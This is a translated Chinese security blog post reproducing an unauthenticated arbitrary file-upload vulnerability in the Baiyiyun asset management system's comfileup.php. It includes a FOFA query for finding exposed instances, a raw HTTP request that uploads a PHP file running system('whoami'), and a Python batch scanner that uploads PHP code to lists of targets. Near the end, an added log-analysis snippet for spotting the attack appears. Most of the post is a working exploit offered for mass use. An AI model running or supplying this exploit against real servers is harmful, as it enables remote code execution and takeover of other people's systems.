The Baiyiyun Asset Management and Operation System (百易云资产管理运营系统) has a file upload vulnerability in its comfileup.php interface. An unauthenticated attacker can upload a malicious backdoor file through it and execute arbitrary code, thereby gaining control of the server.
FOFA:
body="不要着急,点此
None
POST /comfileup.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Content-Type: multipart/form-data; boundary=--------1110146050

----------1110146050
Content-Disposition: form-data; name="file";filename="test.php"

<?php system("whoami");unlink(__FILE__);?>
----------1110146050--
Appending the returned path to the site URL and requesting it yields the number 24642.
Reply "百易云0731" in the public account backend to get the script. The earlier Yonyou (用友) network-disk link has expired; you can re-enter "用友0728" to get it again.
# encoding:utf-8
import time
import requests
import argparse
import ssl
import urllib3
import re
import json
from requests.exceptions import RequestException
from urllib3.exceptions import InsecureRequestWarning

# ssl._create_unverified_context: create an SSL context that does not verify the server certificate when making HTTPS requests.
ssl._create_default_https_context = ssl._create_unverified_context
# urllib3.disable_warnings(): disable urllib3's insecure-request warnings so that unverified HTTPS requests do not print a warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Terminal colours for output
RED = '\033[31m'
GREEN = '\033[32m'
RESET = '\033[0m'


def check_vuln(url):
    url = url.strip("/")
    target = url + "/comfileup.php"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3',
        'Content-Type': 'multipart/form-data; boundary=--------1110146050'
    }
    headers1 = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
                      'Chrome/58.0.3029.110 Safari/537.3'
    }
    data = """----------1110146050\r\nContent-Disposition: form-data; name="file";filename="test.php"\r\n\r\n<?php print(111*222);unlink(__FILE__);?>\r\n----------1110146050--"""
    try:
        response = requests.post(target, headers=headers, data=data, verify=False, timeout=20)
        if response.status_code == 200 and 'fname' in response.text and '"vpath":"/uploads/' in response.text:
            response_data = json.loads(response.text)
            vpath_value = response_data['vpath']
            clean_vpath = re.sub(r'\/', '/', vpath_value)
            res_url = url + clean_vpath
            result_response = requests.get(res_url, headers=headers1, verify=False, timeout=20)
            if result_response.status_code == 200 and '24642' in result_response.text:
                print(f"{RED}[+] {url} 存在任意文件上传漏洞,上传地址为:{res_url}{RESET}")
            else:
                print(f"{GREEN}[-] {url} 不存在任意文件上传漏洞{RESET}")
            return True
        else:
            pass
    except Exception as e:
        pass


def main():
    parser = argparse.ArgumentParser(description="文件上传漏洞检测脚本")
    parser.add_argument("-u", "--url", help="目标URL")
    parser.add_argument("-f", "--file", help="目标URL列表文件")
    args = parser.parse_args()
    if args.url:
        url = "http://" + args.url if not args.url.startswith(("http://", "https://")) else args.url
        check_vuln(url)
    elif args.file:
        with open(args.file, "r") as f:
            urls = f.read().splitlines()
        for url in urls:
            url = "http://" + url if not url.startswith(("http://", "https://")) else url
            check_vuln(url)


if __name__ == "__main__":
    main()
python .\BaiYiYun-comfileup-Fileupload.py -f .\1.txt
python .\BaiYiYun-comfileup-Fileupload.py -u 192.168.1.1
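On the defensive side, the pattern described above (an unauthenticated POST to comfileup.php followed shortly by a request for a PHP file under /uploads/) is easy to spot in web server access logs. The following is an added example, not part of the original post or the scanner above; it assumes Apache/nginx combined log format and uses constructed sample lines.

```python
import re
from datetime import datetime, timedelta

# Apache/nginx combined log format (assumed log source).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)
UPLOAD_ENDPOINT = "/comfileup.php"  # the vulnerable endpoint from the advisory
# Server-side script extensions under the upload directory (/uploads/ per the advisory).
EXEC_UNDER_UPLOADS = re.compile(r"^/uploads/.*\.(php\d?|phtml|phar)$", re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format access-log line; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_upload_abuse(lines, window_s=300):
    """Flag a POST to comfileup.php followed, from the same client within window_s
    seconds, by a request for a server-side script under /uploads/."""
    last_post = {}  # client ip -> time of its most recent POST /comfileup.php
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path == UPLOAD_ENDPOINT:
            last_post[rec["ip"]] = rec["ts"]
        elif EXEC_UNDER_UPLOADS.match(path):
            posted = last_post.get(rec["ip"])
            if posted is not None and rec["ts"] - posted <= timedelta(seconds=window_s):
                alerts.append({"ip": rec["ip"], "path": path, "status": rec["status"]})
    return alerts


# Constructed sample log lines (not real traffic): one upload-then-execute sequence,
# one benign download from /uploads/, and one script request with no preceding upload.
SAMPLE_LOG = [
    '203.0.113.7 - - [31/Jul/2024:10:00:01 +0800] "POST /comfileup.php HTTP/1.1" 200 87',
    '203.0.113.7 - - [31/Jul/2024:10:00:03 +0800] "GET /uploads/test.php HTTP/1.1" 200 5',
    '198.51.100.9 - - [31/Jul/2024:10:05:00 +0800] "GET /uploads/report.pdf HTTP/1.1" 200 10240',
    '198.51.100.9 - - [31/Jul/2024:10:06:00 +0800] "GET /uploads/a.php HTTP/1.1" 404 0',
]
```

Running `find_upload_abuse(SAMPLE_LOG)` returns a single alert for 203.0.113.7 and /uploads/test.php; the PDF download and the orphan script request are not flagged.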
Originally published on the WeChat public account (扫地僧的茶饭日常): [Vulnerability Reproduction] Baiyiyun Asset Management and Operation System comfileup.php arbitrary file upload vulnerability (with batch verification script)
Disclaimer: the programs (methods) mentioned in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site bears no legal or joint liability. For questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).